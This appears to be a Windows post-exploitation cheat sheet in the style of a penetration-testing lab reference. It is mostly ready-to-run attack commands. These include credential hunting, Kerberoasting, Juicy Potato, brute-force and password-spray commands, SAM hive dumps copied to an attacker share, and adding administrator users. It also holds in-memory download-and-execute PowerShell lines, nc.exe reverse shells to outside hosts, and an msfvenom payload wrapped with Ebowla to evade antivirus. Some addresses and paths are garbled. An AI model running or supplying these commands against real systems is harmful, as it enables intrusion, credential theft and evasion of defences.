Windows System Enumeration
SIMPLE WINDOWS ENUMERATION
All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…
SystemInfo
Network Users and Statistics
Firewall
Services and Tasks
Powershell Policy Unrestricted
View Hotfixes
List Domain Controller
Searches on Windows
Find Modules
PowerUp.ps1
Kerberoast
Juicy Potato
Inspect Files and Folders
Directory Enumeration
One-Liner Ping Script
Change Passwords
Unquoted Service Path
Crackmapexec
Brute-Force Examples
Credential Reuse
PsExec Connections
RPC
Remote Desktop
SQL
Common Enumeration Tools
Enable Windows Installer
SAM Dumps
File Transfers
Anti-Virus Evasion
Restart Windows
SIMPLE WINDOWS ENUMERATION
… Windows Versions to reference:
Operating System Version Number
Windows 1.0 1.04
Windows 2.0 2.11
Windows 3.0 3
Windows NT 3.1 3.10.528
Windows for Workgroups 3.11 3.11 Windows NT Workstation 3.5 3.5.807 Windows NT Workstation 3.51 3.51.1057 Windows 95 4.0.950 Windows NT Workstation 4.0 4.0.1381 Windows 98 4.1.1998 Windows 98 Second Edition 4.1.2222 Windows Me 4.90.3000 Windows 2000 Professional 5.0.2195 Windows XP 5.1.2600 Windows Vista 6.0.6000 Windows 7 6.1.7600 Windows 8.1 6.3.9600 Windows 10 10.0.10240
SYSTEM INFORMATION
systeminfo | findstr "OS"
systeminfo
# EXACT WINDOWS VERSION
type C:/Windows/system32/eula.txt
NETWORK USERS / STATISTICS
# CURRENT USER
whoami /priv
whoami /all
# NETWORK STATS
netstat -ano #network statistics
netstat -aton #open connections
ipconfig
route print
arp -a #ip to physical address
# COMPUTER INFO
hostname
# USERS
net user
net user /domain
net user administrator /domain
net localgroup #local PC usergroups
net localgroup /domain
net localgroup "administrators" /domain
net group
net group /domain
net group "Domain Admins" /domain
# ADD USER
net user user user /add
net localgroup "Remote Desktop Users" user /add
net localgroup administrators user /add
# ADD DOMAIN USER
net user username password /add /domain
net group "Domain Admins" username /add /domain
# DRIVES / SERVICES
net use #mapped network drives
net start #shows services (manage services)
# ALL NETWORK STUFF AT ONCE
ipconfig /all & route print & arp -a
FIREWALL ENUMERATION
# FIREWALL STATUS AND CONFIGS
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall
# SOMETIMES FIREWALL WILL NEED TO BE DISABLED
netsh firewall set opmode disable
LIST SERVICES / TASKS
net start
wmic service list brief
tasklist /SVC
Schtasks /query /fo LIST /v
wmic service get name,startname
wmic process where "name='chrome.exe'" get ProcessID, ExecutablePath set
SET POWERSHELL POLICY TO UNRESTRICTED
# OFTEN USEFUL
Set-ExecutionPolicy Unrestricted
VIEW HOTFIXES
wmic qfe
LIST DOMAIN CONTROLLER
%logonserver%
# GRAB CREDS FROM GPP
net use z: \dc01SYSVOL
cd C:WindowsSYSVOL
dir /s Groups.xml
findstr -si cpassword C:..Groups.xml
# Groups.xml file, find "cpassword", then gpp-decrypt on kali
SEARCH FOR KEY WORDS
# SEARCH AROUND
dir /s *password*
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /spin "password" *.*
dir /s *pass* == *cred* == *vnc* == *.config*
# COMMON FILES WITH INFO
type c:sysprep.inf
type c:sysprepsysprep.xml
type c:unattend.xml
type %WINDIR%PantherUnattendUnattended.xml
type %WINDIR%PantherUnattended.xml
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c: /s /b | findstr /si *vnc.ini
# REGISTRY DUMPS
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon"
reg query "HKLMSYSTEMCurrentControlSetServicesSNMP"
reg query "HKCUSoftwareSimonTathamPuTTYSessions"
reg query HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
FIND MODULES (tons of results)
cd %appdata%
POWERUP MODULE
… found here (only one example of many)
C:powershell.exe -nop -exec bypass
C:import-module PowerUp.ps1
C:Invoke-AllChecks
# DOWNLOAD AND USE
C:tmp> powershell.exe Invoke-WebRequest -Uri "http://192.168.1.299:443/PowerUp.ps1" -OutFile "C:tmppu.ps1"
C:tmp> powershell.exe import-module C:tmppu.ps1
# RUN REMOTELY (IN MEMORY)
powershell -nop -exec bypass -c "IEX (New-Object Net.webClient).DownloadString('https://192.168.1.299:443/PowerUp.ps1'); Invoke-AllChecks"
LOOK FOR THINGS LIKE THIS:
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
KERBEROAST
… found here (only one example of many)
# UPLOAD SCRIPT AND DUMP TOKEN
c:tmp>powershell -ExecutionPolicy Bypass
PS C:tmp> Import-Module .Invoke-Kerberoast.ps1
PS C:tmp> Invoke-Kerberoast -OutputFormat Hashcat | fl
# ELIMINATE ALL LINE BREAKS AND CRACK
hashcat -m 13100
===============================
# OR REMOTELY WITH CREDENTIALS
impacket-GetUserSPNs domain.com/SVC_Account:password -dc-ip 10.10.10.299 -request
# CRACK THE GIVEN TOKEN
hashcat -m 13100
# CONNECT WITH NEW CREDENTIALS
impacket-psexec active.htb/Administrator:[email protected]
JUICY POTATO
… test script found here (takes approx 15 mins to run)
… list of raw Win 10 CLSIDs found here
… Juicy Potato repo with all CLSIDs found here
# IF YOU CAN TRANSFER WITH SMB
copy \ipsharefolder_with_jp_assets
Directory of c:tmp
04/20/2022 04:18 AM <DIR> .
04/20/2022 04:18 AM <DIR> ..
04/19/2022 11:04 PM 33,813 CLSID.list
04/19/2022 11:04 PM 276 clsidfind.bat
04/20/2022 04:15 AM 46 clsidrev3000.bat
04/19/2022 11:02 PM 263,680 jp.exe
04/19/2022 11:02 PM 213,680 nc.exe
c:tmp>.clsidfind.bat
.clsidfind.bat
{C3A4B402-5900-4AB9-8D2F-F941CD24203B} 10000
{C28D5211-B8E1-44FB-994D-767725BFA20E} 10000
{BEDC0CDA-4771-4C84-A291-7DFC5AEC4745} 10000
[...]
c:tmp>type result.log
type result.log
{6d18ad12-bde3-4393-b311-099c346e6df9};NT AUTHORITYSYSTEM
{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITYSYSTEM
{F087771F-D74F-4C1A-BB8A-E16ACA9124EA};NT AUTHORITYSYSTEM
[...]
# CONTENTS OF rev3000.bat
# c:tmpnc.exe 192.168.119.299 3000 -e cmd.exe
jp -l 3000 -p rev3000.bat -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
INSPECT FILE
file <filename>
# SHORTNAME NOMENCLATIRE
# FIRST 6 CHARS + ~1
C:Program FilesLongName
C:PROGRA~1LONGNA~1
INSPECT FOLDER PERMISSIONS
icacls <file>
cacls <file>
DIRECTORY ENUMERATION
…search for hidden directories
cmd.exe /c dir /a C:/
…show files and subdirectories
gci -Recurse C:users | Select FullName
ls "C:Program Files"
ls "C:Program Files (x86)"
ONE-LINER THINGS
… Nishang’s scripts here
# CMD SHELL PING
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.
# POWER SHELL PING
FOR /L %i IN (1,1,254) DO ping -n 1 10.1.1.%i | FIND /i "Reply"
# EXECUTE REVERSE SHELL SCRIPT REMOTELY
# JUST RENAME TO shell.ps1 AND HOST THE FILE
powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.7:5555/shell.ps1')
WINDOWS CHANGE PASSWORD
net user username newpassword
UNQUOTED SERVICE PATHS
… you may be able to create a binary to stick into an empty path
… Windows will look through the entire path for the requested binary
… if it hits your binary first, it’ll execute the one it finds
# DISPLAY SERVICES / PATHS
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v """
CRACKMAPEXEC EXAMPLES
crackmapexec smb 10.10.1.299
crackmapexec smb 10.10.1.299 -u users.txt -p password.txt --continue-on-success >> cme_spray_10.10.1.299.txt
crackmapexec smb 10.10.1.299 -u username.txt -p password.txt --continue-on-success >> sprayoutput24.txt
BRUTE FORCE EXAMPLES
hydra -L users.txt -P passwords.txt ftp://10.10.1.299
ncrack -U users.txt -P passwords.txt ftp://10.10.1.299
patator ftp_login host=10.10.1.299 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin
kerbrute -domain 10.10.1.229 -user user -passwords ./passtest.txt -outputfile kerbrute_user.txt
CREDENTIAL RE-USE
# IF YOU HAVE DOMAIN USER CREDENTIALS
runas.exe /env /noprofile /user:username password "c:usersPublicnc.exe -nc 192.168.119.299 3000 -e cmd.exe"
PSEXEC EAMPLES
…this works well for privilege escalation
psexec.exe -i -accepteula -d -s c:tmpreverse_80.exe
sudo impacket-psexec user:password@ip
sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py domain.con/user:password@ip
REMOTE PROCEDURE CALL (RPC)
…reveals a ton of information if available
impacket-rpcdump ip
REMOTE DESKTOP CONNECTION
rdesktop -u user -p password
# ENABLE REMOTE DESKTOP
reg add "hklmsystemcurrentcontrolsetcontrolterminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
# SOMETIMES FIREWALL WILL NEED TO BE DISABLED
netsh firewall set opmode disable
# OR YOU CAN ADD A NEW USER
net user test 1234 /add
net localgroup administrators test /add
SQL CONNECTION (if available)
sqsh -S ip -U user
EXAMPLE REVERSE SHELLS
…look here for examples
COMMON ENUMERATION TOOLS
Automate the upload with this…
… jaws-enum.ps1 – simple powershell script
… windows-exploit-suggester.py – simple python script leveraging systeminfo output
… wes.py – same as windows-exploit-suggester, but updated
… nishang scripts – for all stages of pen testing
… windows-priv-checker2 – great for an html file display
# POSSIBLY RUN A FILE
powershell -ExecutionPolicy Bypass -File <file.ps1>
# JAWS
powershell -ExecutionPolicy Bypass -File jaws-enum.ps1
# WINDOWS-SUGGESTER
# RUN ON KALI W/systeminfo FILE FROM WINDOWS
windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database <seen_from_update> --systeminfo systeminfo.txt
# WES
# AQUIRE systeminfo FROM TARGET
wes.py --update
wes.py systeminfo.txt
# WINDOWS PRIVESC CHECKER 2
# OR CHANGE NAME FOR EASE: wpc2.exe
.windows-privesc-check2.exe --audit -a -o wpc-report
# LAZAGNE
.lazagne_pw_dump.exe all
ENABLE WINDOWS INSTALLER
… msi files are used for installations
… these can be created and the system may be able to install them
… use msi for a reverse shell
# ALWAYSINSTALLELEVATED - System Setting
reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
# CREATE PAYLOAD TO ADD USER
msfvenom -p windows/adduser USER=newuser PASS=newpassword -f msi -o malicious.msi
# INSTALL TO EXECUTE
msiexec /quiet /qn /i C:malicious.msi
SAM DUMPS
… SAM dumps are not possible when system is running
… programs can dump them by memory, or you can use the registry
… use msi for a reverse shell
LAN Manager (LM)DES
Windows NT-2003
Passwords longer than 7 chars split into two strings and is hashed separately
Passwords converted to uppercase before hashing
No salt
NT LAN Manager (NTLM)MD4
Windows Vista+
No limit to two 7 char parts
Case sensitive
No salt
# DUMP SAMS (REQUIRES PRIV ACCESS)
reg save hklmsam c:tmpsam
reg save hklmsystem c:tmpsystem
# TRANSFER TO KALI
copy sam \192.168.119.188share
copy system \192.168.119.188share
# COMBINE THE FILES
samdump2 system sam
user::1004:aad3b435b51404eeeeeee435b51404ee:b74242f37e4737eeeeeeea6ebcac4ffe:::
# FOR HASHCAT, USE SECOND PART OF THE HASH
b74242f37e4737eeeeeeea6ebcac4ffe
hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt
FILE TRANSFERS
# POWERSHELL - TRANSFER TO TARGET
powershell.exe (New-ObjectSystem.Net.WebClient).DownloadFile('http://10.11.0.4/whoami.exe', 'c:UsersPublicwhoami.exe')
(new-object System.Net.WebClient).DownloadFile('http://192.168.119.188:443/mimikatz64.exe','C:tmpmmk.exe')
powershell.exe Invoke-WebRequest -Uri "http://192.168.119.188:443/PowerUp.ps1" -OutFile "C:tmpwp64.exe"
powershell.exe Invoke-WebRequest -Uri "http://192.168.119.188:443/PowerUp.ps1" -OutFile "C:tmppu.ps1"
powershell iwr http://192.168.119.188:443/system.ps1 -outfile ./shell.ps1
# RUN SCRIPT FROM ATTACK MACHINE
powershell IEX(New-Object Net.webclient).downloadString('http://ip/shell.ps1')
# OR
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.1.299:443/shell.ps1')
# CMD
copy \attack-ipsharefile
… reverse shell (shell.ps1) reference here
ANTI-VIRUS EVASION
EBOWLA
… Ebowla found here
… Encrypts the payload of the payload with environment variables
… Makes the encryption key pieces part of the env code
–purpose is to have it on the computer to decode for DYNAMIC engines
–also makes sure payload is only made for THAT TARGET
–uses the COMPUTER DOMAIN only, so won’t work on someone’s home computer
https://github.com/Genetic-Malware/Ebowla.git
Encryps the payload of the payload with environment variables
Makes the encryption key pieces part of the env code
-purpose is to have it on the computer to decode for DYNAMIC engines
-also makes sure payload is only made for THAT TARGET
-uses the COMPUTER DOMAIN only, so won't work on someone's home computer
vim genetic.conf
CHANGE
output_type = GO
payload_type = EXE
[[ENV VAR]]
username = '' (deleted)
computername = 'TALLY' (got from hostname on shell)
userdomain = '' (deleted)
THEN CREATE THE PAYLOAD
NOTE: NEED configobj and GO, ON PYTHON2 TO MAKE THIS WORK
└─$ pip2 install configobj
└─$ sudo apt install golang
python2 embowla.py <filename>
USE MSFVENOM TO CREATE THE FILE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.1.299 LPORT=80 -f exe -a x64 -o shell.exe
file shell.exe (to make sure it's 64 bit encoded per the target machine)
OUTPUT: shell.exe: PE32+ executable (GUI) x86-64, for MS Windows
USE EBOWLA TO CREATE THE GO FILE
└─$ python2 ebowla.py ../smbuploads/shell.exe genetic.config
BUILD WITH GO
└─$ ./build_x64_go.sh output/go_symmetric_shell.exe.go ebowla_shell.exe
file ebowla_shell.exe
OUTPUT: ebowla_shell.exe: PE32+ executable (console) x86-64, for MS Windows
CAN USE virustotal.com TO TEST THE NEW PAYLOAD
… reverse shell (shell.ps1) reference here
RESTART WINDOWS
shutdown /r /t 0